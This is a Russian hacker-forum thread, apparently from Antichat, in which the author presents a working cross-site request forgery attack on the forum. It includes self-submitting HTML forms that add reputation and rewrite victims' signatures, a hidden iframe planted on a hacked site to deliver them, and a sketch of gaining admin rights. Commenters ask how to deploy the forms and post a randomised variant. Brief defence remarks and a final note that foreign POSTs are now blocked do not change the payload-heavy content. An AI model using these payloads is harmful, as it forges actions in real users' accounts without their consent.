Втупление
Понедельник - утро... Закончился рабочий день, и я бежал скорей домой, но не лечь в кроватку а зайти в сеть и испробовать способ выполнять команд(?) от другого пользователя на форумах... Способ на столько просто, что я даже не поверил, что он заработает =)

Итак пришел домой, просмотрев фильм "Титаник" два раза и поцеловав Лео Ди через экран сел за компутер... Вообщемто, как мы сможем "заставить" пользователя делать, то, что нам угодно... Я выбрал Добавление мне репутации и Изменение подписи пользователей...

1. Добавление репутации:
Для начала посмотрим форму добавлении репутации, для этого нажимаем на + какому нить пользователю и смотрим сорцы, разобрав мусор, мы выделим и подправим то, что нам нада, а именно:

<form action="http://forum.antichat.ru/reputation.php" method="post">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(" /> Это наш комент (вернее уже не наш)... =)
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440" /> А это уже НАШЕ сообщение (т.е. на которое придет репутация)..

А какже мы заставим пользователя нажать на submit? А зачем его заставлять? Добавим id в форму и добавим событие, при котором после загрузки страницы submit "нажимаеться сам"...

Вот полный "скрипт":

<body onload="p.submit()">
<form action="http://forum.antichat.ru/reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos"/>Одобряю</label></div>
<input type=hidden name="score" value="0">
<input type="hidden" name="reason" value="Не помню, чтобы тебе репу ставил... Как это вышло?! >(">
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="183440"/>
Так, тут всё ясно... Теперь осталось тока заставить пользователя(лей) зайти на эту страницу... У меня есть один хакнутый левый сайт... Я изменил главную страницу добавив в неё:

<iframe src=page.htm width=0 height=0 border=0>
Соответсвенно page.htm содержит код приведенный выше...
и еще добавил алерт с преведами, типа за этим я их и послал сюда =)...
Сидел я вмирке туда я и запостил url... Мол типа прведы вам... =) А на самом деле преведы мне... Вернее превед ("Попался тока ArdeOS =)" Он отказался удалять добавленную им репу, сославшись на респект =) Ну я не против... За это ему тоже отдельный респект...

С этим разобрались? Разобрались...

2. "Приколы".

Ну как можно "поприкалываться"... Варианты есть... Вообщемто почти все, еслибы мы были "жертвой"... Ну например добавление сообщений, ПМ, Создание темы, изменить личное инфо (кроме пароля), подпись... Я остановился на последнем... Идем с начала...
Заходим на страницу изменении подписи->Смотрим сорцы-Ювыдираем и чистим то, что нужно нам...
Покажу сразу рабочий код =)
<body onload="p.submit()">
<form action="http://forum.antichat.ru/profile.php" method="post" id="p">
<input type="hidden" name="message" value="Owned by Jesus (извините миня...) =)"> Как не сложно догодаться это и есть новая подпись =)
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="updatesignature" />
</form>
На этот раз попалась Fishka_Shtuchka... Теперь у неё на подписи красуться заветный текст =) ...

ЗЫ: Я ИЗВИНИЛСЯ И ИЗВИНЯЮСЬ =)

3. А теперь о серьезном...
Этот спопсоб можно применить для того, чтобы зделать себя админом...
"Теоретим": Например Админ зашел в Админку и у него сохранилась сессия, значит при следующем входе в админку форум пароль просить не будет, значит можно попробовать... Абсолютно все также! Заходим->Cмотрим сорцы->чистим и редактируем->Думаем как послать это админу->Админим =)

Защититься от этого? Ну даже не знаю... Для форума, я бы предложил зделать проверку по рефералу. Чтоб с левый url скрипты не выполнялись...
Скажет Вася Пупкин: "Но ведь есть способы подделать referer!"... Конечно можно, но тогда нам в покете отправлять cookie... А если они у нас есть, зачем все выше сказанное? =)

Для пользователей... Пользуйтесь другим браузером, котгда гуляете по "левым" ссылкам =)

Еще раз извиняюсь =)

Просто не надо ходить по левым ссылкам.:)

Да довольно интересно,только после этого репу можно удалить..

А для тугих можно обьяснить куда это скрипты девать? просто создать сайт в нете и в код странички вписать скрипты? и еще, они только на этом форуме пашут?

А для тугих можно обьяснить куда это скрипты девать? просто создать сайт в нете и в код странички вписать скрипты? и еще, они только на этом форуме пашут?

зайди на _http://ms-dosant.narod.ru/teror.html

там все написано :D

Нифига все нормально, он дыру нашел

Блин, я это не пробовал, только потому что был уверен что referer проверяется.

Кстати репу тебе исправил с 66 на 69 :D

Спасибки всем...
Fishka_Shtuchka извини... А подпись тупая придумалась... Сам не знаю, как мне такое в голову пришло =)

bul.666 да ладно ;)

Чё то не пашет! Короче на форуме выложил ссылку типа mysite.ru/script.html
и пробовал перейти по ней и мне выдоло вот это
In order to accept POST request originating from this domain, the admin must add this domain to the whitelist. В чём трабла ?

Добавляю:

Воть скриптик:

<body onload="p.submit()">
<form action="http://forum.antichat.ru/reputation.php" method="post" id="p">
<input type="hidden" name="reputation" value="pos">
<input type=hidden name="score" value="0">
<input type="hidden" name="do" value="addreputation" />
<script>
var myArray;
mas=new Array(4);
mas=new Array("187748","181609","183229","183440"); //Масcив с нашими постами
var myArray;
ct = new Array(6);
ct = new Array("+",")"," ","))","+++","Ы"); //C коментами =)
var a = Math.round(Math.random()*3); //Выбираем случайны топик
var aa = mas[a];
var b = Math.round(Math.random()*5); //Выбираем случайный коммент
var bb = ct[b];
document.write("<input type=hidden size=40 maxlength=250 name=reason value="+bb+">");
document.write("<input type=hidden name=p value="+aa+">");
</script>

По этому скрипту вам, будут, приходить не тупо в один пост с одним коментом, а будет их менять =)

Естественно советую вам сестно зарабатывать инфу -)

Чё то не пашет! Короче на форуме выложил ссылку типа mysite.ru/script.html
и пробовал перейти по ней и мне выдоло вот это
В чём трабла ?
пост-запросы, идущие с домена твоего сайта фильтруются сайтом-целью (серв правильно настроили).
чтоб они не фильтровались твой домен нужно в вайт-лист добавить ;)

А как добавить в вайт лист тогда ? Это надо делать через сервер или форум ?? Плз answer :D

А как добавить в вайт лист тогда ? Это надо делать через сервер или форум ?? Плз answer :D

Какаой хостинг?

ошибка) +1

А мною законно гдето ~85? честно говоря не ожидал =)

Прикольно. Особенно добавление подписи

если ктонить написал пост для админки=) выложите плз щаблончик=)
посмотреть\-)

Только сейчас увидел тему. Но че-то я не понимаю, почему это все работает. Все как-то очень банально. Или это из-за того, что на Ачате идет привязка к ИПу.... ХЗ кароче.
Но булу респект. ;)

3. А теперь о серьезном...
Этот спопсоб можно применить для того, чтобы зделать себя админом...
"Теоретим": Например Админ зашел в Админку и у него сохранилась сессия, значит при следующем входе в админку форум пароль просить не будет, значит можно попробовать... Абсолютно все также! Заходим->cмотрим сорцы->чистим и редактируем->Думаем как послать это админу->Админим =)
Извиняюсь! Когда первый раз смотрел форму, то не заметил, что админскую сессию надо передовать скрипту в пост запросе, т.е. через форму... А мы этого не можем, значит 3 пункт отпадает... =) Хотя это ведь будет работать не тока на Ачате =), темболее, что на Ачате уже не возможно =)
Извиняюсь =))))))
POST requests from foreign hosts are not allowed.
Молодцы +)